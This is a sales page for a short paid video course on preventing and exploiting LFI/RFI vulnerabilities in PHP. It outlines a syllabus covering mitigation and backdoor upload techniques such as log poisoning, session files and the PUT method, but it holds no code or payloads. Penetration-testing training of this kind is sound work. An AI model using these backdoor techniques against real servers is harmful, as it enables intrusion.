How to prevent LFI and RFI attacks

“PHP is used by 82.5% of the websites…”

Taught by: Peter Zsiros

Length: 1.5 hours

78 students

$13.00

Local and Remote File Inclusion (LFI/RFI) attacks are popular amongst hackers. It mostly affects web applications written in PHP, so a great majority of websites could be exposed to it.

In this minicourse we will examine how this technique works and how to avoid running someone else's malicious code on your server. We will cover the mitigation techniques against this type of attack, and the different backdoor "upload" possibilities as upload forms, through databases, log poisoning, session files and the PUT method.

------------------------------

Other hacking courses from the same trainer, Peter Zsiros.

+ − Recommended for
It can be very useful for web developers so that they can make more secure websites, and for ethical hackers so that they can make thorough penetration tests. It can also be useful for system administrators and testers.
+ − Prerequisites
Basic programming knowledge, basic knowledge of HTTP protocol.
+ − Technical requirements
Minimum 4GB memory
+ − Acquired skills
You will be able to identify and exploit these kinds of vulnerabilities, and learn how to avoid them by learning the configuration possibilities to reduce attack risk.

Free

Section 1 - Introduction to LFI/RFI

Video 1 - Setting up our test environment

Video 2 - Introduction to LFI and RFI vulnerabilities

First we install our test environment. (For this you can download the virtual machine and the ISO image from http://www.duckademy.com/downloads.) Then we look for a remote and a local file inclusion. With the help of the examples you will understand the reason behind these kinds of vulnerabilities.

Virtual lab and downloads info.pdf
How LFI and RFI work.pdf step-by-step manual, 42 pages
Video 1 - Setting up our test environment.mp4 6:11, 26MB
Video 2 - Introduction to LFI and RFI vulnerabilities.mp4 19:22, 58MB

Section 2 - Backdoor upload techniques

We examine different possibilities to upload backdoors to be able to call our code through the LFI attack. We will upload backdoors to webpages with different picture testing capabilities and will upload a file when the PUT http method is enabled, and insert a backdoor if we can write to a database. We will also upload a backdoor when there is no dedicated writing possibility (ex. log file poisoning).

Video 3 - Uploading backdoors through upload forms.mp4 27:41, 108MB
Video 4 - Other upload techniques 31:05, 103MB

What you get

1.5 hours of downloadable videos

Unlimited access to:

4 informative videos
virtual machine and ISO image
step-by-step manual
forum to ask and discuss
Certificate of completion - sample

$13.00

Buy it now No risk money back guarantee

Buy it now for $13.00

Very detailed explanations. Peter has the ability to make any topic interesting. It was just a short course and not a particularly fancy topic, but I still learned a lot from it.

Eric Grunberg

Amsterdam, the Netherlands

Peter Zsiros

Peter is a professional ethical hacker (OSCP, OSCE). Besides doing penetration tests he has also been teaching on this topic for more than 10 years. He likes to go deep into the bits and discovering things no one has before. Peter also likes to share his knowledge and findings with others and that is why he likes teaching.

Comments - Ask the instructor

Ask, help others, comment!